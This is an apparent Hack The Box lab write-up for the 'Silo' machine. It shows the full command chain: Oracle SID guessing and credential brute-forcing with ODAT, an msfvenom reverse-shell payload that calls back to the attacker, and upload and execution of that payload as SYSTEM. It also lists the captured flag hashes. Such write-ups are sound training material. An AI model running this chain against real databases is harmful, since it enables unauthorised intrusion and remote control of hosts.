Windows Boxes

silo

  1. nmap
  2. Oracle Database Attack Tool
    1. SID Guesser
    2. oracle default account wordlist
    3. odat passwordguesser
    4. odat upload
      1. odat utlfile -h
      2. msfvenom
      3. utlfile
    5. odat externaltable
  3. user/root
  4. lessons learned

silo

images/689-1.png
images/689-2.png

nmap

nmap -sV -sC -oA nmap/silo 10.10.10.82
images/690-1.png


images/690-2.pngimages/690-3.png

Oracle Database Attack Tool

Since this box is using an oracle database, lets apt -get install ODAT
images/691-1.png
images/691-2.png

Commands here:
images/691-3.png

SID Guesser

The first thing we need to enumerate is the Oracle System ID (SID) string. This is a string that is used to uniquely identify a particular database on a system. This can be done using the sidguesser module in ODAT.

odat sidguesser -s 10.10.10.82 -p 1521
images/692-1.png
images/692-2.png

oracle default account wordlist

There is a special user wordlist stored within the metasploit-framework that is perfect for enumerating potential oracle database users located at
/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt
lets copy it over to our working directory
images/694-1.png

The username and passwords in this list are separated by a space instead of a forward slash (/). We’ll have to change it to forward slash so that the ODAT tool is able to parse the file. This can be done in vi using the following command.

images/694-2.png
:%s/ /\//g
images/694-3.pngimages/694-4.png


Now that we have a proper list, we can use the passwordguesser module to brute force credentials.

odat passwordguesser

odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /root/Documents/htb/boxes/silo/ocacle_default_userpass.txt
images/695-1.png



scott/tiger worked!
images/695-2.png

odat upload

ODAT has a utlfile module that allows you to upload, download or delete a file. Since we are trying to get code execution on the box, let’s upload a malicious executable that sends a reverse shell back to our attack machine
images/697-1.png

odat utlfile -h

images/698-1.png

msfvenom

First, generate the executable using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.62 LPORT=1234 -f exe > shell.exe
images/693-1.png

utlfile

Next, upload the file using the utlfile module to put our shell.exe reverseshell payload onto the server.

odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp shell.exe /root/Documents/htb/boxes/silo/shell.exe

We get the following error.
images/696-1.png

We don’t have sufficient privileges to upload a file. Let’s see if the user was given sysdba privileges by adding the --sysdba flag to our command.

odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp shell.exe /root/Documents/htb/boxes/silo/shell.exe --sysdba
images/696-2.png
our upload was successful and stored onto the /temp directory on the 10.10.10.82 server according to odat's output, however, the /temp directory is not reachable on our webserver and dirbuster would take a while busting where the /temp directory

luckily, odat has a module that allows us to execute our .exe payload within its commandline called externaltable

odat externaltable

odat externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba

images/699-1.png

check back to our listener and we have connected to the box as system! no need to priv esc
images/699-2.png

user/root

images/701-1.png
92ede778a1cc8d27cb6623055c331617

images/701-2.png
cd39ea0af657a495e33bc59c7836faf6

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
\images/440-1.png